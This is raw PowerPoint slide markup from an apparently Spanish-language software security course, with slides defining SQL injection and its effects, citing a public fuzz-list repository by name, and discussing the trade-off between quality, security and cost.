          <p:cNvPr id="17" name="Picture 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E633F70-43BA-5F20-BC9A-BE7BB38230B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect r="19048" b="-339"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1055286"/>
            <a:ext cx="4771891" cy="4939688"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Oval 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F394EA0A-7247-1B0E-7C0C-FC4E163EE6AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5346130" y="1866604"/>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21" name="Oval 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0F4BAE3-F585-7A7E-9ABF-D2A7CE719A4E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5346130" y="331140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22" name="Oval 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{125C6F91-2242-1AF7-7CB6-3D84B2E050B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5346130" y="4756209"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Imagen 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18ABE6C8-D80F-7577-1B54-6FF3B7DF07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6927" y="2027807"/>
            <a:ext cx="762000" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="004C41"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="Imagen 23" descr="Icono&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{002C3894-E014-A34A-1542-5AD39A3573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3780" y="4985493"/>
            <a:ext cx="609600" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="004C41"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="Imagen 24" descr="Icono&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1674442-33FC-C52A-988A-0D55C02A00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3780" y="3559057"/>
            <a:ext cx="609600" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="004C41"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Imagen 2" descr="Interfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0527C741-2328-BB83-022A-C0D43E143A57}"/>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248324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8F3E9-601A-C436-0D5C-D4E3B4E2472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7278F49-DD05-D855-AF3C-FEF16F24BC60}"/>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CE61F2D-90A2-7DB7-77B6-A14B992A04C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Inyección SQL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A88E1422-4FBB-31E8-40D5-8C1BE1BD209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69FDC1EC-09F1-ABCE-B9B7-DADD4AE1D91D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1658327" y="2338632"/>
            <a:ext cx="9658505" cy="64633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Consiste en la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>inserción de datos en una consulta SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>generada dinámicamente a través de una entrada del cliente en la aplicación.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="CuadroTexto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2AD96D1-2CEC-C741-99E2-A5BA310B6584}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1658327" y="3710255"/>
            <a:ext cx="8427233"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Permite </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>acceder a datos confidenciales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modificar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>datos en las bases de datos incluyendo su </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>eliminación</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, ejecutar operaciones de administración en la base de datos…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Oval 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0DEB98B-1FDD-557A-3E47-6144B7690BC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="441554" y="2102637"/>
            <a:ext cx="1099178"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Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Oval 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E29CBD59-3FB4-4FE5-AB2A-691718B73A24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="441554" y="365042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Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Imagen 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{169399A9-B7ED-8662-55E5-E24D76360BE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5386431" y="4438929"/>
            <a:ext cx="1419135" cy="1432913"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Imagen 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C742844D-1329-5421-28AF-28B4629C7B4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5331473" y="986158"/>
            <a:ext cx="1529053" cy="1207622"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Imagen 9" descr="Interfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EEAF3A4-ED67-EB44-B3BA-38C336CCAA0C}"/>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832264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7B98E-6A1B-D537-C9A6-12F6922204A6}"/>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B0DECC8-E37D-67BE-0F9E-81D2670C9608}"/>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C64423AA-1818-E9AB-167D-DC76C1F152F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Inyección SQL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5C422ED-36F8-9FBE-D533-4644870ECDD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9" name="CuadroTexto 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48E57004-3E05-869E-8A42-E1342B19B710}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429767" y="2619585"/>
            <a:ext cx="4187499"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En Internet están disponibles </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>múltiples listados </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>para realizar inyección SQL.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="CuadroTexto 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBCB2474-0431-7C5F-D777-6D450FAA4D39}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="5036495"/>
            <a:ext cx="3679136" cy="738664"/>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s-ES" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Referencia: </a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Segoe UI"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>IntruderPayloads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>FuzzLists</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t> at master · 1N3/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>IntruderPayloads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t> · GitHub</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Grupo 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB05E60D-6C57-C13B-5285-712A47653889}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4481066" y="1272405"/>
            <a:ext cx="6525749" cy="4313190"/>
            <a:chOff x="5069171" y="2143958"/>
            <a:chExt cx="6525749" cy="4313190"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="12" name="Picture 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3AACE68-E7C5-E03B-206F-4181F4452D54}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId5"/>
            <a:srcRect r="40883" b="40770"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="5069171" y="2143958"/>
              <a:ext cx="5705808" cy="4133422"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="13" name="Picture 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C082EB57-E029-262C-B6A0-4CDEEDDE200F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId6"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="9520280" y="2588877"/>
              <a:ext cx="2074640" cy="3868271"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="14" name="Straight Arrow Connector 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C30C1EB-1263-507D-973F-C264575758CC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="8892617" y="3019184"/>
              <a:ext cx="587189" cy="4482"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="28575">
              <a:solidFill>
                <a:srgbClr val="004C4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Imagen 2" descr="Interfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B04EB4EE-CF86-A3E0-F767-E4EB5572F92E}"/>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43868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80024-AF89-95F1-51FD-B58340E0D361}"/>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C619086-A039-5079-42EB-C7DC788C78C4}"/>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25C5CAEC-030A-6FD4-B23E-4D19FB057C8E}"/>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Calidad y seguridad VS Costes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{213141D5-6CCB-C572-6410-983F79B4FCE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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC4754D0-93B2-6291-A2DE-15648A1994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33" t="13659" r="-1933" b="29928"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3232422" y="1281263"/>
            <a:ext cx="5403321" cy="4572260"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectángulo 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07679713-5FF0-DE06-63EA-B1EE202E40C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="883305" y="2339116"/>
            <a:ext cx="2200989" cy="626991"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:pr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000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Calidad y seguridad</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectángulo 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4081940-83A6-CE58-6C41-E53783B5DD0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8635743" y="4633768"/>
            <a:ext cx="2200989" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:pr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000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Coste</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectángulo 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50D9B487-ABBE-8619-0AF2-EDC7631F8A0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8635743" y="5093011"/>
            <a:ext cx="2200989" cy="626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Presupuesto</a:t>
            </a:r>
          </a:p>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Tiempo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectángulo 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2980A45B-A7A9-E244-D537-7563CDCE1A2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="881853" y="3061095"/>
            <a:ext cx="2200989" cy="1057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Requisitos de seguridad</a:t>
            </a:r>
          </a:p>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Recursos disponibles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectángulo: esquinas diagonales cortadas 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B52998AD-49C3-3BEA-8B2E-E1CD445D8157}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8635743" y="1674665"/>
            <a:ext cx="2636865" cy="1907996"/>
          </a:xfrm>
          <a:prstGeom prst="snip2Diag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rgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Una </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>correcta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>gestión del</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>equilibrio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> entre la calidad, seguridad y costes es </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>fundamental</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> en el desarrollo de software. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="Grupo 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
